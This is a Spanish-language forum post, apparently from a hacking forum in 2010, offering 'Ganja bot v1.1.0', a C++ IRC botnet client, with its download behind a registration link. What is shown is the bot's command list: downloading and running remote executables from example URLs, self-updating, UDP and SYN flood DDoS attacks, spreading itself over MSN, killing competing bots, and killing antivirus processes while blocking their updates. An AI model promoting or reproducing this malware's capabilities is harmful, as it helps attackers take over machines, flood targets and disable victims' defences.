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Ganja bot v1.1.0 [C++] [IRC] Info1810 Para ver Todo el contenido del foro es necesario estar Registrado! Ganja bot v1.1.0 [C++] [IRC] Info1810
Ganja bot v1.1.0 [C++] [IRC] Info1810 Antes de comentar o Aportar es Obligado Leer Las: Reglas | Rules Ganja bot v1.1.0 [C++] [IRC] Info1810
Ganja bot v1.1.0 [C++] [IRC] Info1810Ya Esta Disponible al publico "LeProject" el Videojuego del Foro Click Aquí Para Ver el Post. Ganja bot v1.1.0 [C++] [IRC] Info1810
Ganja bot v1.1.0 [C++] [IRC] Info1810Pitbull Security Labs "Extras" Esta Disponible! [ENTRA]Ganja bot v1.1.0 [C++] [IRC] Info1810

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Dom Oct 03, 2010 7:37 pm

[Tienes que estar registrado y conectado para ver este vínculo]

!Silent - This toggels the bots silence

!join - Joins a specified channel

!part - Leaves a specified channel
!dl - downloads and executes a specfic exe - ex. !dl yoursite.com/your.exe winlogon.exe 1

!die - removes the bot from the computer and Uninstalls itself

!update - updates to a specific exe - ex. !update yoursite.com/your.exe 1

!clean - Performs the botkiller command that scans through the computers processes and kills
all bot processes on sight. ( kills every bot except gbot )
!visit - visits a specified website

!speedtest - Performs a download on a test file to determine the bots speed.

!udp - Performs a DDoS attack on specified target and port. ex. !udp ip port delay time

!ssyn - Perfoms a TCP attack on speceifed target and port. ex !ssyn ip port time

!msn - Performs msn spread with provided exe link. ex !msn dircetvirus.com/your.exe

!sort - sort / unsort your bots by locale

/sethost - login the bots

!av.kill - scans for running Anti-virus processes and kills them on sight. also disabling the A.V from updating.
/oper /op

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